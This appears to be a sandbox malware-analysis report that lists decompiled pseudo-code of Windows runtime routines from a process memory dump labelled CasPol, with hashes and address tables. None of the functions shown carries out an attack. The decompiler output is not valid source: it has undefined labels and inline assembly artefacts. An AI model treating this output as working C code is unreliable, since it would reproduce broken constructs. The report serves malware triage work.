                                                                • Instruction ID: c9dbbd4de32afd05969f4065e28b445ace661928987d36f83060ee1cb8ec7652
                                                                • Opcode Fuzzy Hash: f5e896cdb3e51bdf1e16720b36a1fd3954c1d7fdf208df86d8ee007553c1a5d8
                                                                • Instruction Fuzzy Hash: 8A41B0B17026119BE7269BADCC9CB3BBBDAAF94620F04831DF956873D0DB34D801D691
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0164DBE9 Relevance: .1, Instructions: 149COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 86%
                                                                			E0164DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0162CC50(E01624510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01647D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E016F8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01642280(_t58, _v44);
						E0164DD82(_v44, _t102, _t98);
						E0164B944(_t102, _v5);
						return E0163FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1718628; // 0x0
							_v28 = _t67;
							_t68 =  *0x171862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1718628; // 0x0
						_t105 = _v28;
						_t80 =  *0x171862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x16efb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                0x0164dbe9
                                                                0x0164dbf2
                                                                0x0164dbf7
                                                                0x0164dbf9
                                                                0x0164dbfc
                                                                0x0164dc00
                                                                0x0164dc03
                                                                0x0164dc14
                                                                0x0164dd54
                                                                0x0164dd54
                                                                0x0164dd54
                                                                0x0164dc18
                                                                0x0164dc1d
                                                                0x0164dc1d
                                                                0x0164dc32
                                                                0x0164dc3b
                                                                0x0164dc3e
                                                                0x0164dc46
                                                                0x0164dd5b
                                                                0x0164dd62
                                                                0x0164dd64
                                                                0x0164dd67
                                                                0x0164dd69
                                                                0x0164dd6b
                                                                0x0164dd6e
                                                                0x0164dd70
                                                                0x0164dd73
                                                                0x0164dd73
                                                                0x00000000
                                                                0x0164dc4c
                                                                0x0164dc4e
                                                                0x01693ae3
                                                                0x01693ae8
                                                                0x01693aea
                                                                0x0164dce7
                                                                0x0164dce9
                                                                0x0164dcec
                                                                0x0164dcee
                                                                0x0164dcf0
                                                                0x0164dcf3
                                                                0x0164dcf5
                                                                0x01693af2
                                                                0x01693af5
                                                                0x01693af5
                                                                0x0164dd06
                                                                0x0164dd08
                                                                0x0164dd0b
                                                                0x0164dd12
                                                                0x01693b08
                                                                0x0164dd18
                                                                0x0164dd18
                                                                0x0164dd18
                                                                0x0164dd20
                                                                0x0164dd23
                                                                0x01693b16
                                                                0x01693b16
                                                                0x0164dd29
                                                                0x0164dd2d
                                                                0x0164dd36
                                                                0x0164dd40
                                                                0x0164dd51
                                                                0x0164dd51
                                                                0x0164dc54
                                                                0x0164dc59
                                                                0x0164dc59
                                                                0x0164dc5e
                                                                0x0164dc5e
                                                                0x0164dc63
                                                                0x0164dc66
                                                                0x0164dc6b
                                                                0x0164dc78
                                                                0x0164dc7b
                                                                0x0164dc81
                                                                0x0164dc81
                                                                0x0164dc83
                                                                0x0164dc89
                                                                0x00000000
                                                                0x00000000
                                                                0x0164dd7b
                                                                0x0164dd7b
                                                                0x0164dc8f
                                                                0x0164dc8f
                                                                0x0164dc92
                                                                0x0164dc99
                                                                0x0164dc9f
                                                                0x0164dca5
                                                                0x0164dcaa
                                                                0x0164dcaa
                                                                0x0164dcb3
                                                                0x0164dcb8
                                                                0x0164dcbb
                                                                0x0164dcc1
                                                                0x0164dccf
                                                                0x0164dcd2
                                                                0x0164dcd5
                                                                0x0164dcd7
                                                                0x0164dcda
                                                                0x0164dcdc
                                                                0x0164dcdc
                                                                0x0164dce2
                                                                0x0164dce4
                                                                0x00000000
                                                                0x0164dce4

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ce8cc469085d60bc50df5448c6082cd2966de33ebf6e26ebbb912e528492b949
                                                                • Instruction ID: cd0405acb86cee3dabeabc049f1d910b483496208a581f608b04ae56210022fe
                                                                • Opcode Fuzzy Hash: ce8cc469085d60bc50df5448c6082cd2966de33ebf6e26ebbb912e528492b949
                                                                • Instruction Fuzzy Hash: 2B51DE72E00216CFCB15CFACC890AAEBBF6FF59310F20815AD995A7304DB30A940CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0163EF40 Relevance: .1, Instructions: 147COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 96%
                                                                			E0163EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E01629080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7788c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E01622D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                0x0163ef4b
                                                                0x0163ef4d
                                                                0x0163ef57
                                                                0x0163f0bd
                                                                0x0163f0c2
                                                                0x0163f0d2
                                                                0x0163f0d2
                                                                0x0163f0c2
                                                                0x0163ef5d
                                                                0x0163ef5f
                                                                0x0163ef67
                                                                0x0163ef6a
                                                                0x0163ef6d
                                                                0x0163ef74
                                                                0x0163ef7f
                                                                0x0163ef82
                                                                0x0163ef82
                                                                0x0163ef86
                                                                0x0163ef88
                                                                0x0163ef8c
                                                                0x0163ef8f
                                                                0x0163ef8f
                                                                0x0163ef8f
                                                                0x00000000
                                                                0x0163ef91
                                                                0x0163ef93
                                                                0x0163efc4
                                                                0x0163efc4
                                                                0x0163efc4
                                                                0x0163efca
                                                                0x0163efd0
                                                                0x0163f0a6
                                                                0x00000000
                                                                0x00000000
                                                                0x0163f0af
                                                                0x0168bb06
                                                                0x0168bb0a
                                                                0x0163f0b5
                                                                0x0163f0b5
                                                                0x0163f0b5
                                                                0x0163f0b5
                                                                0x00000000
                                                                0x0163efd6
                                                                0x0163efd9
                                                                0x0163f0de
                                                                0x0163f0e2
                                                                0x0163efdf
                                                                0x0163efdf
                                                                0x0163efdf
                                                                0x0163efe5
                                                                0x0168bafc
                                                                0x0168bafc
                                                                0x0163efe5
                                                                0x0163efeb
                                                                0x0163efed
                                                                0x0163f00f
                                                                0x0163f011
                                                                0x0163f01a
                                                                0x0163f01d
                                                                0x0163f021
                                                                0x0163f028
                                                                0x0163f029
                                                                0x0163f029
                                                                0x0163f02c
                                                                0x00000000
                                                                0x0163f02c
                                                                0x0163eff3
                                                                0x0163eff9
                                                                0x0163f0ea
                                                                0x0163f0ed
                                                                0x0163f0ef
                                                                0x00000000
                                                                0x0163f0ef
                                                                0x0163f003
                                                                0x0168bb12
                                                                0x0163f045
                                                                0x0163f049
                                                                0x0163f051
                                                                0x0163f09e
                                                                0x0163f0a0
                                                                0x0163f0a0
                                                                0x0163f09e
                                                                0x0163f053
                                                                0x0163f064
                                                                0x0163f064
                                                                0x0163f06b
                                                                0x0168bb1a
                                                                0x0168bb1a
                                                                0x0163f071
                                                                0x0163f071
                                                                0x0163f07d
                                                                0x0163f082
                                                                0x0163f08f
                                                                0x0163f08f
                                                                0x0163f009
                                                                0x0163f00d
                                                                0x00000000
                                                                0x0163f00d
                                                                0x0163efd0
                                                                0x0163ef97
                                                                0x0163efa5
                                                                0x0163efaa
                                                                0x00000000
                                                                0x0163efac
                                                                0x0163efac
                                                                0x0163efac
                                                                0x00000000
                                                                0x0163efb2
                                                                0x0163f036
                                                                0x0163f03a
                                                                0x0163f040
                                                                0x0163f090
                                                                0x00000000
                                                                0x0163f092
                                                                0x0163f042
                                                                0x00000000
                                                                0x0163f042
                                                                0x0163efb7
                                                                0x0163efb9
                                                                0x0163efbc
                                                                0x0163efb0
                                                                0x0163efb0
                                                                0x00000000
                                                                0x0163efbe
                                                                0x0163efbe
                                                                0x0163efc1
                                                                0x00000000
                                                                0x0163efc1
                                                                0x0163efbc
                                                                0x0163efaa
                                                                0x0163ef91

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                • Instruction ID: a095f44a84e991dfd6da76de6ec92936d50093c39987e71aca6e6577a63db549
                                                                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                • Instruction Fuzzy Hash: D8510430E04649DFEB25CB6CC9A07AEFBB1AF85314F1881ACD54553382C7B6A989C752
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F740D Relevance: .1, Instructions: 141COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 84%
                                                                			E016F740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0167D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0166F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L01644620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L01644620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0166F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L01644620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                0x016f740d
                                                                0x016f740d
                                                                0x016f7412
                                                                0x016f7413
                                                                0x016f7416
                                                                0x016f7418
                                                                0x016f741c
                                                                0x016f741f
                                                                0x016f7422
                                                                0x016f7422
                                                                0x016f7428
                                                                0x016f742a
                                                                0x016f742a
                                                                0x016f7451
                                                                0x016f7432
                                                                0x016f744f
                                                                0x016f744f
                                                                0x00000000
                                                                0x016f7434
                                                                0x016f7438
                                                                0x016f7443
                                                                0x016f7517
                                                                0x016f7517
                                                                0x016f751a
                                                                0x016f7535
                                                                0x016f7520
                                                                0x016f7527
                                                                0x016f752c
                                                                0x016f7531
                                                                0x016f7533
                                                                0x00000000
                                                                0x016f7533
                                                                0x00000000
                                                                0x016f7531
                                                                0x016f754b
                                                                0x016f754f
                                                                0x016f755c
                                                                0x016f755c
                                                                0x016f755f
                                                                0x016f7560
                                                                0x016f7561
                                                                0x016f7562
                                                                0x016f7563
                                                                0x016f7568
                                                                0x016f756a
                                                                0x016f756c
                                                                0x016f756d
                                                                0x016f756d
                                                                0x016f756f
                                                                0x016f7572
                                                                0x016f7574
                                                                0x016f7577
                                                                0x016f757c
                                                                0x016f757f
                                                                0x00000000
                                                                0x016f7551
                                                                0x016f7551
                                                                0x016f7551
                                                                0x016f7553
                                                                0x016f7553
                                                                0x016f7449
                                                                0x016f7449
                                                                0x016f744c
                                                                0x016f744c
                                                                0x00000000
                                                                0x016f744c
                                                                0x016f7443
                                                                0x016f750e
                                                                0x016f7514
                                                                0x016f7514
                                                                0x016f7455
                                                                0x016f7469
                                                                0x016f746d
                                                                0x00000000
                                                                0x016f7473
                                                                0x016f7473
                                                                0x016f7476
                                                                0x016f7480
                                                                0x016f7484
                                                                0x016f748e
                                                                0x016f7493
                                                                0x016f7493
                                                                0x016f7496
                                                                0x016f7499
                                                                0x016f74a1
                                                                0x016f74b1
                                                                0x016f74b5
                                                                0x00000000
                                                                0x016f74bb
                                                                0x016f74c1
                                                                0x016f74c1
                                                                0x016f74c4
                                                                0x016f74c5
                                                                0x016f74c6
                                                                0x016f74c7
                                                                0x016f74c8
                                                                0x016f74cd
                                                                0x00000000
                                                                0x016f74d3
                                                                0x016f74d3
                                                                0x016f74d6
                                                                0x016f74d8
                                                                0x016f74db
                                                                0x016f74dd
                                                                0x016f74e0
                                                                0x016f74e7
                                                                0x016f74ee
                                                                0x016f74ee
                                                                0x016f74f4
                                                                0x016f74f9
                                                                0x00000000
                                                                0x016f74fb
                                                                0x016f74fb
                                                                0x016f74fd
                                                                0x016f7500
                                                                0x016f7503
                                                                0x016f7505
                                                                0x016f7505
                                                                0x016f74f9
                                                                0x00000000
                                                                0x016f74cd
                                                                0x016f74b5
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                • Instruction ID: 93663e2e4eb91d92cc9469e79171e0c229a1af65c4aea9d07e1b9f5c4ca718e1
                                                                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                • Instruction Fuzzy Hash: 58519071600646EFDB16CF58D884A96BBB5FF45304F14C0AEEA08DF252EB71E946CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01652990 Relevance: .1, Instructions: 133COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 97%
                                                                			E01652990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x16fff00);
				E0167D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1601664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0166E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1601668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E016A51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x160166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01652AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E01636600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01652C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0163EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01652AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01652C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01652ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0167D0D1(_t62);
				goto L28;
			}





















                                                                0x01652990
                                                                0x01652992
                                                                0x01652997
                                                                0x016529a3
                                                                0x016529a6
                                                                0x016529ab
                                                                0x016529ad
                                                                0x016529b2
                                                                0x01695c80
                                                                0x016529b8
                                                                0x016529b8
                                                                0x016529bb
                                                                0x016529c0
                                                                0x016529c5
                                                                0x016529c6
                                                                0x016529c6
                                                                0x016529cb
                                                                0x00000000
                                                                0x00000000
                                                                0x016529cd
                                                                0x016529d0
                                                                0x016529d9
                                                                0x016529db
                                                                0x016529dd
                                                                0x01652a7f
                                                                0x01652a84
                                                                0x01652a87
                                                                0x01652a89
                                                                0x01695ca1
                                                                0x01695ca3
                                                                0x00000000
                                                                0x01652a8f
                                                                0x01652a8f
                                                                0x00000000
                                                                0x01652a8f
                                                                0x00000000
                                                                0x016529e3
                                                                0x016529e3
                                                                0x016529e3
                                                                0x00000000
                                                                0x016529e3
                                                                0x016529dd
                                                                0x00000000
                                                                0x016529db
                                                                0x016529e6
                                                                0x016529e9
                                                                0x016529eb
